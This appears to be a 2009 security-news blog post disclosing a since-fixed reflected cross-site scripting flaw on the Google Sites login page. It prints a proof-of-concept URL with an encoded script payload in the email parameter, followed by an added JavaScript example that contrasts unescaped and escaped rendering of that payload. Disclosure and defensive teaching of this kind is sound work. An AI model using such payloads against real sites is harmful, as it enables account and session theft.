Google Sites Reflective Cross-Site Scripting
Written by KF
Friday, 30 January 2009
UPDATE: Fixed in less than 2 hours: clap clap!
Get it while it's hot! Pierre Gardenat submitted a very interesting reflective cross-site scripting vulnerability affecting the login page of Google Sites.
This could be used, for example, to steal accounts, but don't worry, it will probably be fixed very quickly by Google, just like the last times ;)
Enjoy!
PoC: https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Pierre%20Gardenat%27)%3C%2Fscript%3E&uls=Valider
Mirror: http://www.xssed.com/mirror/57587/
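
Added example, not part of the original post and not Google's code: it decodes the UniversalLoginEmail value from the PoC URL above and renders it into a form field with and without output encoding. The input markup, the field name and all function names are assumptions; the post does not say where the value was reflected, only that the payload opens with a quote and tag-closing sequence.

```javascript
// PoC URL copied verbatim from the post.
const POC_URL =
  "https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Pierre%20Gardenat%27)%3C%2Fscript%3E&uls=Valider";

// Value a server would receive after URL-decoding the query string.
function reflectedEmail(url) {
  return new URL(url).searchParams.get("UniversalLoginEmail") ?? "";
}

// Encode every character that can end an attribute value or open a tag.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Assumed markup: the submitted address pre-filled back into the login form.
function renderUnsafe(email) {
  return `<input type="text" name="Email" value="${email}">`;
}

// Same template with contextual output encoding applied at the sink.
function renderSafe(email) {
  return `<input type="text" name="Email" value="${escapeHtmlAttr(email)}">`;
}

// Number of tag openers in a fragment; the template alone contributes one.
function tagCount(html) {
  return (html.match(/</g) || []).length;
}

const email = reflectedEmail(POC_URL);
console.log("decoded parameter:", email);
console.log("unsafe:", renderUnsafe(email), "tags:", tagCount(renderUnsafe(email)));
console.log("safe:  ", renderSafe(email), "tags:", tagCount(renderSafe(email)));
```

In the unencoded output the quote and "/>" close the input element and the script element that follows becomes live markup; in the encoded output the whole value stays inside the attribute.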